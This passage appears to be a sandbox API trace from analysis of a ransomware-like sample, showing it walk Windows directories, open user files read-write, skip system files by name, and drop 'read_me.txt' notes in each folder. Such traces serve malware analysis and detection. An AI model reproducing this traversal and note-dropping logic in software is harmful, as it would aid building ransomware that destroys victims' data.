lpSrch="boot.ini") returned 0x0 [0075.113] StrStrW (lpFirst="winre.wim", lpSrch="ntuser.dat.log") returned 0x0 [0075.113] StrStrW (lpFirst="winre.wim", lpSrch="thumbs.db") returned 0x0 [0075.113] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 4 [0075.113] QueueUserWorkItem (Function=0x404e00, Context=0x79c, Flags=0x0) returned 1 [0075.113] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="winre.wim", cAlternateFileName="")) returned 0 [0075.113] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.113] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\read_me.txt") returned 64 [0075.113] GetProcessHeap () returned 0x4f10000 [0075.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ac0068 | out: hHeap=0x4f10000) returned 1 [0075.113] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 32 [0075.113] GetProcessHeap () returned 0x4f10000 [0075.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.314] GetProcessHeap () returned 0x4f10000 [0075.314] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c10110 [0075.315] wnsprintfW (in: pszDest=0x8c10110, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\System Volume Information\\*") returned 34 [0075.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\System Volume Information\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="winre.wim", cAlternateFileName="")) returned 0xffffffff [0075.315] wnsprintfW (in: pszDest=0x8c10110, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\System Volume Information\\read_me.txt") returned 44 [0075.315] GetProcessHeap () returned 0x4f10000 [0075.316] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c10110 | out: hHeap=0x4f10000) returned 1 [0075.316] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 33 [0075.316] GetProcessHeap () returned 0x4f10000 [0075.316] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.430] GetProcessHeap () returned 0x4f10000 [0075.430] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c50130 [0075.431] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\*") returned 14 [0075.431] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.432] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\.") returned 14 [0075.432] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.432] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\..") returned 15 [0075.432] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0075.432] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 33 [0075.432] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0075.432] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users") returned 22 [0075.432] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0075.432] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default") returned 20 [0075.432] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0075.432] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default User") returned 25 [0075.432] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.432] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0075.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.432] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0075.432] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0075.432] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0075.432] CloseHandle (hObject=0x7b8) returned 1 [0075.432] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0075.432] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public") returned 19 [0075.432] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24502440, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0075.432] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\read_me.txt") returned 24 [0075.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\read_me.txt" (normalized: "c:\\users\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.433] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0075.433] CloseHandle (hObject=0x7b8) returned 1 [0075.433] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24502440, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24502440, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24502440, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0075.433] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.433] wnsprintfW (in: pszDest=0x8c50130, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\read_me.txt") returned 24 [0075.433] GetProcessHeap () returned 0x4f10000 [0075.433] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c50130 | out: hHeap=0x4f10000) returned 1 [0075.433] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 34 [0075.433] GetProcessHeap () returned 0x4f10000 [0075.433] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.738] GetProcessHeap () returned 0x4f10000 [0075.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d710c8 [0075.739] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 35 [0075.739] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfea68 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\.") returned 35 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\..") returned 36 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 41 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned 50 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x245e6c80, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x245e6c80, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 42 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned 41 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 41 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 43 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned 43 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned 43 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned 39 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned 48 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 39 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned 46 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0075.740] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned 41 [0075.740] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0075.741] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 44 [0075.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.741] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0075.741] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0075.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.741] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0075.741] wnsprintfW 